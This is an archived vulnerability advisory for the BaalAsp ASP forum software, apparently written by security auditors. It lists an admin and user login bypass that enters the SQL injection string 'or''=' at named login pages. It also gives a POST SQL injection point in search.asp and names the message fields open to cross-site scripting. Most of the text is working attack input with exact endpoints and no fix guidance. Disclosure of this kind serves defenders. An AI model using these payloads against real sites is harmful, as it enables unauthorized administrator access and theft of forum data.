TUCoPS :: Web BBS :: etc :: b06-5833.htm

BaalAsp forum
BaalAsp forum
BaalAsp forum



vendor site:http://baalasp.com/ 
product:BaalAsp forum  
bug:login bypass, injection sql post, xss post
risk:high

authentification bypass :
admin login bypass ==> /adminlogin.asp
passwd: 'or''='
user login bypass ==> /userlogin.asp
user: 'or''='
passwd: 'or''='

injection sql (post)
==> /search.asp
variables : page=1&total=1&search='[sql]
or just post your query into the search engine

xss post : 
/addpost1.asp?
vulnerables fields :
- Subject:
- Group Name:
- Message:


laurent gaffi=E9 & benjamin moss=E9
http://s-a-p.ca/ 
contact: saps.audit@gmail.com 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH